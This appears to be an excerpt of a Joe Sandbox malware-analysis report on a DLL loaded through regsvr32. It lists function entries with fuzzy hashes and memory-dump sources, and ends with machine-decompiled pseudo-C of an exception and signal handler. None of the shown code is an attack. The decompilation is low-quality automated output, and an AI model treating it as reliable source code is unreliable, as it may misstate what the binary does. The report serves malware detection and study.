                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9e827f4b2f689b12e4ccf72ca1d6eff7ffc2258e188e8563f719b24c02115733
                                                                                                                      • Instruction ID: 468b9019079d95a70ac6df6df506c377ec674d3237085aff5c0fddfb74d40ed3
                                                                                                                      • Opcode Fuzzy Hash: 9e827f4b2f689b12e4ccf72ca1d6eff7ffc2258e188e8563f719b24c02115733
                                                                                                                      • Instruction Fuzzy Hash: 5651C27150478C8BEFBADF28CD997DB3BA1FB58348F904619D84E8A250CB769649CB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180013470 Relevance: .1, Instructions: 107COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf968373fb032e90f9ec3ef8e57a2fd80819a49c487b30aa3fbee29bbbb5e740
                                                                                                                      • Instruction ID: ca2fd9f60ad6a39c43a48bc51390af7395821a1aecd3d46c2badec513a39ba2f
                                                                                                                      • Opcode Fuzzy Hash: bf968373fb032e90f9ec3ef8e57a2fd80819a49c487b30aa3fbee29bbbb5e740
                                                                                                                      • Instruction Fuzzy Hash: 3951AEB090078E8FDB48DF68C88A5DE7BB0FB58358F504A19ED6A96250D3B4D664CBC1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180008858 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cc1c80e43c6778ed2a4396366779a100648668e02b82afa07303c584cbbb16ca
                                                                                                                      • Instruction ID: cac282bf4f2ba9748617232446f66b930b8c98ad61a4df93a92d77414674447e
                                                                                                                      • Opcode Fuzzy Hash: cc1c80e43c6778ed2a4396366779a100648668e02b82afa07303c584cbbb16ca
                                                                                                                      • Instruction Fuzzy Hash: A341E2B580074E8FCB48DF68C48A5DE7FB0FB68388F104619E856A6250D3B896A5CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800212A0 Relevance: .1, Instructions: 82COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8b8109ecf0b2f9a042417244b09ee6c0563b7d6ccfff5b5b437739fa9d865e96
                                                                                                                      • Instruction ID: afd57a87b5e164dd38732b11d6ab281dca4e08e41ca0ad448f026870cf6c9355
                                                                                                                      • Opcode Fuzzy Hash: 8b8109ecf0b2f9a042417244b09ee6c0563b7d6ccfff5b5b437739fa9d865e96
                                                                                                                      • Instruction Fuzzy Hash: 6841CEB090034A8BCF48DF28C48A5DE7FA0FBA8398F104619FC5A9A250D774D6A4CBC1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180001A00 Relevance: .1, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 00c8f35848492250cff33dddaa0d8c5a3725a83cef47318db22abc7836df0930
                                                                                                                      • Instruction ID: 936d6e9dd4094d70682975c5c29ee453f69fab6e1240469dfab2c5cf01325d98
                                                                                                                      • Opcode Fuzzy Hash: 00c8f35848492250cff33dddaa0d8c5a3725a83cef47318db22abc7836df0930
                                                                                                                      • Instruction Fuzzy Hash: 2041E5B191039E8FCB48CF68D88A5DE7BB0FB58744F104A19F866A6220D3B4D664CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001363C Relevance: .1, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bc47e6e65e4a31775b881a64914b0aff5612f83fa249f362df64f37649f7b26f
                                                                                                                      • Instruction ID: bdf1b7d3c52ed84855c7067c3c091d6381e25179b8ccef7557aae0c60da6c962
                                                                                                                      • Opcode Fuzzy Hash: bc47e6e65e4a31775b881a64914b0aff5612f83fa249f362df64f37649f7b26f
                                                                                                                      • Instruction Fuzzy Hash: 4E41A0B090078ECFCF48DF68C88A5DE3BB0FB58358F014A19E86696250D3B4D669CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018002556C Relevance: .1, Instructions: 75COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c49f742d8424404289193d8868621ac901cf9e967ae48bfeb4113da93c348ba0
                                                                                                                      • Instruction ID: 36cb71fdd8f179d5ff6e820e84779f24659b0a6968269d4304819db217bb9379
                                                                                                                      • Opcode Fuzzy Hash: c49f742d8424404289193d8868621ac901cf9e967ae48bfeb4113da93c348ba0
                                                                                                                      • Instruction Fuzzy Hash: D131AFB090038A8FCF48DF68C8865DE7FB0FB58358F514A19E85AA6250D7B8D664CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800195D0 Relevance: .1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 272997156579645f24e94d0e228846b2f454e2f972357ff9ba2904dce351ae06
                                                                                                                      • Instruction ID: 1c493465c0d98bb4882c50897dd37d000269c1fae9b22fbff29a06e2a1336b83
                                                                                                                      • Opcode Fuzzy Hash: 272997156579645f24e94d0e228846b2f454e2f972357ff9ba2904dce351ae06
                                                                                                                      • Instruction Fuzzy Hash: 9C31ABB09587848BD388DF69C48A50BFBE1BBC4358F504A1DF8C296760D7B4D548CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800045DC Relevance: .1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8013182e11ee3a8c86dd2e656156254319a7e78dc0c5faeab6db5dccbf571966
                                                                                                                      • Instruction ID: aa4a7dda9d946902b7ebfadaec2fd2ff98ab66f8e28fc760664e7750b85bd54a
                                                                                                                      • Opcode Fuzzy Hash: 8013182e11ee3a8c86dd2e656156254319a7e78dc0c5faeab6db5dccbf571966
                                                                                                                      • Instruction Fuzzy Hash: 8031D3B040074ECBCF48CF24C48A5DE3FB0FB68388F104609F85AA6254D7B496A4CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180020B50 Relevance: .1, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 610f6731d46646f51338ee389dbcaaaebe3c66c8507d4a4b2da634d4faae6240
                                                                                                                      • Instruction ID: 931f8f53b134587435b8262e3dc30c17ae81dec4558e5e6d0d3904620be5ef09
                                                                                                                      • Opcode Fuzzy Hash: 610f6731d46646f51338ee389dbcaaaebe3c66c8507d4a4b2da634d4faae6240
                                                                                                                      • Instruction Fuzzy Hash: 9831ACB150039E8FCF48DF64C88A5CE7BB0FB18358F014A19E86AA6250D7B4D669CB95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800048A0 Relevance: .1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 19ca53cd647b9caf6f02c8d282d8e6fd3f8e24e6358ece41ac7e3c44c6f46f58
                                                                                                                      • Instruction ID: e8b0edf5998bea0a4dde420793ccc2844137c7395e45db5bf9a5601ab04cf2b0
                                                                                                                      • Opcode Fuzzy Hash: 19ca53cd647b9caf6f02c8d282d8e6fd3f8e24e6358ece41ac7e3c44c6f46f58
                                                                                                                      • Instruction Fuzzy Hash: C0317E70528385AFC388DF28D4CA91ABBE0FBC9748F906A2DF8C686250D775D446CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180012120 Relevance: .1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: af524f830225b869b61c7703bf6b2f90f412e01c6fd4c2552f3320a9d1acbead
                                                                                                                      • Instruction ID: 0cbf02577aa860683974a02e7ee0f51c688bf140c24bf29fab8499070b94a73a
                                                                                                                      • Opcode Fuzzy Hash: af524f830225b869b61c7703bf6b2f90f412e01c6fd4c2552f3320a9d1acbead
                                                                                                                      • Instruction Fuzzy Hash: B531A1B050038E8FCB48CF68D88A5DE3BB0FB58358F504A1DE86696250D7B89664CBD9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180010C08 Relevance: .1, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 179d24e09472dbfeb4954f24f76bc0a0eed924a6bfa147ad6c686e72151bd97c
                                                                                                                      • Instruction ID: c7e6b47fe5e730b230a072bec5ce6cdb50e340a087ebfc1a4899d4b93ea5bc3b
                                                                                                                      • Opcode Fuzzy Hash: 179d24e09472dbfeb4954f24f76bc0a0eed924a6bfa147ad6c686e72151bd97c
                                                                                                                      • Instruction Fuzzy Hash: 95315CB06187848BD748DF28C45A51ABBE1BBDC308F404B2DF4CAAB350D778DA458B4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180022284 Relevance: .1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1fe986873ae8563229150ae099efa4ede7a6d2f63740cd1b15d29d4f7bf51cae
                                                                                                                      • Instruction ID: 17e363d1f9dfcaeba580523b8b32acecfa43d620a7b170a1f33da81232df59fb
                                                                                                                      • Opcode Fuzzy Hash: 1fe986873ae8563229150ae099efa4ede7a6d2f63740cd1b15d29d4f7bf51cae
                                                                                                                      • Instruction Fuzzy Hash: 5E3158B05583818B8348DF28D04A41ABBE0FBDD74CF804B1DF4CAAA2A0D738D655CB4B
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180019414 Relevance: .1, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2c35a914b74522d3f67fec40b4bee07e27447b4ff2149b5ad5a167007b14cdfa
                                                                                                                      • Instruction ID: 4457a30fceed7efe4c454087a7b9cb3308906dead1ff0aef4dd9b7484eaee675
                                                                                                                      • Opcode Fuzzy Hash: 2c35a914b74522d3f67fec40b4bee07e27447b4ff2149b5ad5a167007b14cdfa
                                                                                                                      • Instruction Fuzzy Hash: 3721BF709587848BD358CF28C08A51BBFE1FBC5384F604A1DF5968A360D774D889CB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800224A8 Relevance: .1, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1710daedb81dfd00f28e2635c1f304200efc15f4e107109d13b45219be72ca40
                                                                                                                      • Instruction ID: 8b1e32b027c7c681c079de73f43f0cdda7ec1a0caa23a1cc2bea2c2f140901c1
                                                                                                                      • Opcode Fuzzy Hash: 1710daedb81dfd00f28e2635c1f304200efc15f4e107109d13b45219be72ca40
                                                                                                                      • Instruction Fuzzy Hash: 932146B55087858BC348DF28C58A41ABBE1FB9C348F414B2DF4DAAA260D7789605CB4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000D990 Relevance: .1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 496ee0284466fb55f7a9f63183da93d67e21baf12f8af7376bfcc43bc2e37e77
                                                                                                                      • Instruction ID: f6c0086bf9fb66903d9967eb5ed23ab19f6959629265641b3d1938cc0f1d446e
                                                                                                                      • Opcode Fuzzy Hash: 496ee0284466fb55f7a9f63183da93d67e21baf12f8af7376bfcc43bc2e37e77
                                                                                                                      • Instruction Fuzzy Hash: F5216DB0529781AFD788DF29D48991BBBE0FB99308F806A2DF88697250D370D455CB47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000D6A4 Relevance: .1, Instructions: 56COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93e0bbb99453ea7132342a41d5e68cbcbdbaf92769f486498afaee62b9b8bdef
                                                                                                                      • Instruction ID: 1ddfb605a3f1c5ecb09827dc007ecc4896b2b70849c06f02ae57c41dc5cc3b62
                                                                                                                      • Opcode Fuzzy Hash: 93e0bbb99453ea7132342a41d5e68cbcbdbaf92769f486498afaee62b9b8bdef
                                                                                                                      • Instruction Fuzzy Hash: BF216B746187848BC349DF28D45941ABBE1FB8C71CF400B1DF4CAAA354D7B8E645CB4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000EFEC Relevance: .0, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdd339c76fbedce123d200fc44485f67912c8c5fd13d365c5e0b2635809a51a0
                                                                                                                      • Instruction ID: 59cebbf573bc484a77e806a9e85b043536aad459f4fe6839c8d1284ae1f27a0d
                                                                                                                      • Opcode Fuzzy Hash: cdd339c76fbedce123d200fc44485f67912c8c5fd13d365c5e0b2635809a51a0
                                                                                                                      • Instruction Fuzzy Hash: A4212BB56187848FC749DF28C45650BBBE0FB9D348F410B1DF4CAA6220D3799645CB4B
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A0A268 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9cdf929a385d2f6bf6cf4cf856b9c225f3682ddb6b3d0b145fe7146d9f3679b1
                                                                                                                      • Instruction ID: 6cdb095bd97baea91a8d3575e10c15239a773a04d639134f5409160e40372bc9
                                                                                                                      • Opcode Fuzzy Hash: 9cdf929a385d2f6bf6cf4cf856b9c225f3682ddb6b3d0b145fe7146d9f3679b1
                                                                                                                      • Instruction Fuzzy Hash: 50B0021651F7D016DB13877119A12582E724392840F8F84D7C29882697C08D141CD327
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A02470 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 511 61a02470-61a0248c 512 61a02520-61a02524 511->512 513 61a02492-61a02497 511->513 512->513 516 61a0252a 512->516 514 61a024e0-61a024e5 513->514 515 61a02499-61a0249e 513->515 520 61a02540-61a02545 514->520 521 61a024e7 514->521 517 61a024a4 515->517 518 61a025d5-61a025d7 515->518 519 61a02530-61a0253b 516->519 522 61a02591-61a02596 517->522 523 61a024aa-61a024af 517->523 524 61a024ec-61a024fc signal 518->524 520->519 525 61a02547 520->525 521->524 522->519 526 61a02598-61a0259d 522->526 523->519 527 61a024b1-61a024b6 523->527 530 61a02610-61a02626 signal 524->530 531 61a02502-61a02505 524->531 528 61a025e0-61a025e5 525->528 529 61a0254d-61a02552 525->529 532 61a024c0-61a024ca 526->532 534 61a025a3-61a025b3 signal 526->534 527->521 535 61a024b8 527->535 528->534 536 61a025e7-61a025ec 528->536 529->519 537 61a02554-61a02559 529->537 538 61a02513-61a02519 530->538 539 61a0262c-61a02639 call 61a02ca0 530->539 531->532 533 61a02507-61a0250e 531->533 542 61a02600-61a02602 532->542 543 61a024d0-61a024d8 532->543 533->538 540 61a02660-61a0266f signal 534->540 541 61a025b9-61a025bc 534->541 535->532 536->532 544 61a025f2 536->544 537->532 545 61a0255f-61a0256f signal 537->545 539->538 541->532 548 61a025c2-61a025d4 541->548 542->538 543->514 544->519 549 61a02640-61a02654 signal 545->549 550 61a02575-61a02578 545->550 549->538 550->532 552 61a0257e-61a02590 550->552
                                                                                                                      C-Code - Quality: 61%
                                                                                                                      			E61A02470(intOrPtr* __rcx) {
				intOrPtr _v32;
				signed int _t6;
				signed int _t37;
				void* _t40;
				signed int* _t51;
				void* _t53;

				_t51 =  *((intOrPtr*)(__rcx));
				_t6 =  *_t51;
				if((_t6 & 0x20ffffff) == 0x20474343) {
					__eflags = _t51[1] & 0x00000001;
					if((_t51[1] & 0x00000001) != 0) {
						goto L1;
					} else {
						asm("o16 nop [eax+eax]");
						goto L17;
					}
				} else {
					L1:
					if(_t6 <= 0xc0000091) {
						if(_t6 < 0xc000008d) {
							__eflags = _t6 - 0xc0000008;
							if(__eflags == 0) {
								goto L17;
							} else {
								if(__eflags > 0) {
									__eflags = _t6 - 0xc000001d;
									if(_t6 == 0xc000001d) {
										goto L27;
									} else {
										__eflags = _t6 - 0xc000008c;
										if(_t6 != 0xc000008c) {
											goto L7;
										}
										goto L17;
									}
								} else {
									__eflags = _t6 - 0x80000002;
									if(_t6 == 0x80000002) {
										goto L17;
									} else {
										__eflags = _t6 - 0xc0000005;
										if(_t6 != 0xc0000005) {
											goto L7;
										}
										L61A02D80();
										__eflags = _t47 - 1;
										if(_t47 == 1) {
											L61A02D80();
											return 0xffffffff;
										}
										__eflags = _t47;
										if(_t47 == 0) {
											goto L7;
										}
										 *_t47();
										return 0xffffffff;
									}
								}
							}
						} else {
							goto L10;
						}
					} else {
						_t40 = _t6 - 0xc0000094;
						if(_t40 == 0) {
							_t37 = 0;
							goto L11;
						} else {
							if(_t40 > 0) {
								__eflags = _t6 - 0xc0000095;
								if(_t6 == 0xc0000095) {
									goto L17;
								} else {
									__eflags = _t6 - 0xc0000096;
									if(_t6 != 0xc0000096) {
										goto L7;
									}
									L27:
									L61A02D80();
									__eflags = _t47 - 1;
									if(_t47 == 1) {
										L61A02D80();
										return 0xffffffff;
									}
									__eflags = _t47;
									if(_t47 == 0) {
										goto L7;
									}
									 *_t47();
									return 0xffffffff;
								}
							} else {
								if(_t6 == 0xc0000092) {
									L17:
									return 0xffffffff;
								} else {
									if(_t6 != 0xc0000093) {
										L7:
										_t47 =  *0x61a08640;
										if( *0x61a08640 == 0) {
											return 0;
										}
										_t53 = _t53 + 0x38;
										goto __rax;
									}
									L10:
									_t37 = 1;
									L11:
									L61A02D80();
									if(_t47 != 1) {
										if(_t47 == 0) {
											goto L7;
										}
										 *_t47();
										return 0xffffffff;
									}
									L61A02D80();
									__eflags = _t37;
									if(_t37 != 0) {
										_v32 = 0xffffffff;
										E61A02CA0(0xffffffff);
										return _v32;
									}
									return 0xffffffff;
								}
							}
						}
					}
				}
			}









                                                                                                                      0x61a02476
                                                                                                                      0x61a0247c
                                                                                                                      0x61a0248c
                                                                                                                      0x61a02520
                                                                                                                      0x61a02524
                                                                                                                      0x00000000
                                                                                                                      0x61a0252a
                                                                                                                      0x61a0252a
                                                                                                                      0x00000000
                                                                                                                      0x61a0252a
                                                                                                                      0x61a02492
                                                                                                                      0x61a02492
                                                                                                                      0x61a02497
                                                                                                                      0x61a024e5
                                                                                                                      0x61a02540
                                                                                                                      0x61a02545
                                                                                                                      0x00000000
                                                                                                                      0x61a02547
                                                                                                                      0x61a02547
                                                                                                                      0x61a025e0
                                                                                                                      0x61a025e5
                                                                                                                      0x00000000
                                                                                                                      0x61a025e7
                                                                                                                      0x61a025e7
                                                                                                                      0x61a025ec
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a025f2
                                                                                                                      0x61a0254d
                                                                                                                      0x61a0254d
                                                                                                                      0x61a02552
                                                                                                                      0x00000000
                                                                                                                      0x61a02554
                                                                                                                      0x61a02554
                                                                                                                      0x61a02559
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02566
                                                                                                                      0x61a0256b
                                                                                                                      0x61a0256f
                                                                                                                      0x61a0264a
                                                                                                                      0x00000000
                                                                                                                      0x61a0264f
                                                                                                                      0x61a02575
                                                                                                                      0x61a02578
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02583
                                                                                                                      0x61a02590
                                                                                                                      0x61a02590
                                                                                                                      0x61a02552
                                                                                                                      0x61a02547
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02499
                                                                                                                      0x61a02499
                                                                                                                      0x61a0249e
                                                                                                                      0x61a025d5
                                                                                                                      0x00000000
                                                                                                                      0x61a024a4
                                                                                                                      0x61a024a4
